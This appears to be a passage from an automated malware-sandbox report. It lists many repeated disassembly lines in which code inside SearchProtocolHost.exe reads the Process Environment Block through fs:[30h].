        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA750 mov eax, dword ptr fs:[00000030h]19_2_037CA750
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov ecx, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C174A mov eax, dword ptr fs:[00000030h]19_2_037C174A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038617BC mov eax, dword ptr fs:[00000030h]19_2_038617BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C3740 mov eax, dword ptr fs:[00000030h]19_2_037C3740
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F7CF mov eax, dword ptr fs:[00000030h]19_2_0384F7CF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B9723 mov eax, dword ptr fs:[00000030h]19_2_037B9723
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379471B mov eax, dword ptr fs:[00000030h]19_2_0379471B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379471B mov eax, dword ptr fs:[00000030h]19_2_0379471B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379D700 mov ecx, dword ptr fs:[00000030h]19_2_0379D700
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037977F9 mov eax, dword ptr fs:[00000030h]19_2_037977F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037977F9 mov eax, dword ptr fs:[00000030h]19_2_037977F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385970B mov eax, dword ptr fs:[00000030h]19_2_0385970B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385970B mov eax, dword ptr fs:[00000030h]19_2_0385970B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F717 mov eax, dword ptr fs:[00000030h]19_2_0384F717
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383E750 mov eax, dword ptr fs:[00000030h]19_2_0383E750
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037907A7 mov eax, dword ptr fs:[00000030h]19_2_037907A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C1796 mov eax, dword ptr fs:[00000030h]19_2_037C1796
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C1796 mov eax, dword ptr fs:[00000030h]19_2_037C1796
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F68C mov eax, dword ptr fs:[00000030h]19_2_0384F68C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03790670 mov eax, dword ptr fs:[00000030h]19_2_03790670
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2670 mov eax, dword ptr fs:[00000030h]19_2_037D2670
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2670 mov eax, dword ptr fs:[00000030h]19_2_037D2670
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C666D mov esi, dword ptr fs:[00000030h]19_2_037C666D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C666D mov eax, dword ptr fs:[00000030h]19_2_037C666D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C666D mov eax, dword ptr fs:[00000030h]19_2_037C666D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A3660 mov eax, dword ptr fs:[00000030h]19_2_037A3660
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A3660 mov eax, dword ptr fs:[00000030h]19_2_037A3660
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A3660 mov eax, dword ptr fs:[00000030h]19_2_037A3660
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03787662 mov eax, dword ptr fs:[00000030h]19_2_03787662
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03787662 mov eax, dword ptr fs:[00000030h]19_2_03787662
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03787662 mov eax, dword ptr fs:[00000030h]19_2_03787662
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C265C mov eax, dword ptr fs:[00000030h]19_2_037C265C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C265C mov ecx, dword ptr fs:[00000030h]19_2_037C265C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C265C mov eax, dword ptr fs:[00000030h]19_2_037C265C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379965A mov eax, dword ptr fs:[00000030h]19_2_0379965A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379965A mov eax, dword ptr fs:[00000030h]19_2_0379965A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C5654 mov eax, dword ptr fs:[00000030h]19_2_037C5654
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038586A8 mov eax, dword ptr fs:[00000030h]19_2_038586A8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038586A8 mov eax, dword ptr fs:[00000030h]19_2_038586A8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D64A mov eax, dword ptr fs:[00000030h]19_2_0378D64A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D64A mov eax, dword ptr fs:[00000030h]19_2_0378D64A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03793640 mov eax, dword ptr fs:[00000030h]19_2_03793640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF640 mov eax, dword ptr fs:[00000030h]19_2_037AF640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF640 mov eax, dword ptr fs:[00000030h]19_2_037AF640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF640 mov eax, dword ptr fs:[00000030h]19_2_037AF640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC640 mov eax, dword ptr fs:[00000030h]19_2_037CC640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC640 mov eax, dword ptr fs:[00000030h]19_2_037CC640
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038386C2 mov eax, dword ptr fs:[00000030h]19_2_038386C2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385A6C0 mov eax, dword ptr fs:[00000030h]19_2_0385A6C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03790630 mov eax, dword ptr fs:[00000030h]19_2_03790630
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C0630 mov eax, dword ptr fs:[00000030h]19_2_037C0630
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797623 mov eax, dword ptr fs:[00000030h]19_2_03797623
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03795622 mov eax, dword ptr fs:[00000030h]19_2_03795622
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03795622 mov eax, dword ptr fs:[00000030h]19_2_03795622
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC620 mov eax, dword ptr fs:[00000030h]19_2_037CC620
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380C6F2 mov eax, dword ptr fs:[00000030h]19_2_0380C6F2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380C6F2 mov eax, dword ptr fs:[00000030h]19_2_0380C6F2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C360F mov eax, dword ptr fs:[00000030h]19_2_037C360F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BD600 mov eax, dword ptr fs:[00000030h]19_2_037BD600
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BD600 mov eax, dword ptr fs:[00000030h]19_2_037BD600
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F607 mov eax, dword ptr fs:[00000030h]19_2_0384F607
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864600 mov eax, dword ptr fs:[00000030h]19_2_03864600
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03823608 mov eax, dword ptr fs:[00000030h]19_2_03823608
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037896E0 mov eax, dword ptr fs:[00000030h]19_2_037896E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037896E0 mov eax, dword ptr fs:[00000030h]19_2_037896E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379C6E0 mov eax, dword ptr fs:[00000030h]19_2_0379C6E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037956E0 mov eax, dword ptr fs:[00000030h]19_2_037956E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037956E0 mov eax, dword ptr fs:[00000030h]19_2_037956E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037956E0 mov eax, dword ptr fs:[00000030h]19_2_037956E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B66E0 mov eax, dword ptr fs:[00000030h]19_2_037B66E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B66E0 mov eax, dword ptr fs:[00000030h]19_2_037B66E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BD6D0 mov eax, dword ptr fs:[00000030h]19_2_037BD6D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383D62C mov ecx, dword ptr fs:[00000030h]19_2_0383D62C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383D62C mov ecx, dword ptr fs:[00000030h]19_2_0383D62C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383D62C mov eax, dword ptr fs:[00000030h]19_2_0383D62C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03818633 mov esi, dword ptr fs:[00000030h]19_2_03818633
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03818633 mov eax, dword ptr fs:[00000030h]19_2_03818633
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03818633 mov eax, dword ptr fs:[00000030h]19_2_03818633
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037906CF mov eax, dword ptr fs:[00000030h]19_2_037906CF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03798690 mov eax, dword ptr fs:[00000030h]19_2_03798690
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0680 mov eax, dword ptr fs:[00000030h]19_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F582 mov eax, dword ptr fs:[00000030h]19_2_0384F582
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E588 mov eax, dword ptr fs:[00000030h]19_2_0380E588
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E588 mov eax, dword ptr fs:[00000030h]19_2_0380E588
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AC560 mov eax, dword ptr fs:[00000030h]19_2_037AC560
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038185AA mov eax, dword ptr fs:[00000030h]19_2_038185AA
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379254C mov eax, dword ptr fs:[00000030h]19_2_0379254C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C6540 mov eax, dword ptr fs:[00000030h]19_2_037C6540
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C8540 mov eax, dword ptr fs:[00000030h]19_2_037C8540
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AE547 mov eax, dword ptr fs:[00000030h]19_2_037AE547
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2539 mov eax, dword ptr fs:[00000030h]19_2_037D2539
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378753F mov eax, dword ptr fs:[00000030h]19_2_0378753F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378753F mov eax, dword ptr fs:[00000030h]19_2_0378753F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378753F mov eax, dword ptr fs:[00000030h]19_2_0378753F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038105C6 mov eax, dword ptr fs:[00000030h]19_2_038105C6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03793536 mov eax, dword ptr fs:[00000030h]19_2_03793536
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03793536 mov eax, dword ptr fs:[00000030h]19_2_03793536
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A252B mov eax, dword ptr fs:[00000030h]19_2_037A252B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C1527 mov eax, dword ptr fs:[00000030h]19_2_037C1527
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B1514 mov eax, dword ptr fs:[00000030h]19_2_037B1514
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC50D mov eax, dword ptr fs:[00000030h]19_2_037CC50D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC50D mov eax, dword ptr fs:[00000030h]19_2_037CC50D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03792500 mov eax, dword ptr fs:[00000030h]19_2_03792500
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B502 mov eax, dword ptr fs:[00000030h]19_2_0378B502
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BE507 mov eax, dword ptr fs:[00000030h]19_2_037BE507
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381C5FC mov eax, dword ptr fs:[00000030h]19_2_0381C5FC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C15EF mov eax, dword ptr fs:[00000030h]19_2_037C15EF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov ecx, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov ecx, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F51B mov eax, dword ptr fs:[00000030h]19_2_0383F51B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B5E0 mov eax, dword ptr fs:[00000030h]19_2_0379B5E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381C51D mov eax, dword ptr fs:[00000030h]19_2_0381C51D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C65D0 mov eax, dword ptr fs:[00000030h]19_2_037C65D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CC5C6 mov eax, dword ptr fs:[00000030h]19_2_037CC5C6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F5C7 mov eax, dword ptr fs:[00000030h]19_2_0378F5C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037945B0 mov eax, dword ptr fs:[00000030h]19_2_037945B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037945B0 mov eax, dword ptr fs:[00000030h]19_2_037945B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B55F mov eax, dword ptr fs:[00000030h]19_2_0386B55F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B55F mov eax, dword ptr fs:[00000030h]19_2_0386B55F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C2594 mov eax, dword ptr fs:[00000030h]19_2_037C2594
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA580 mov eax, dword ptr fs:[00000030h]19_2_037CA580
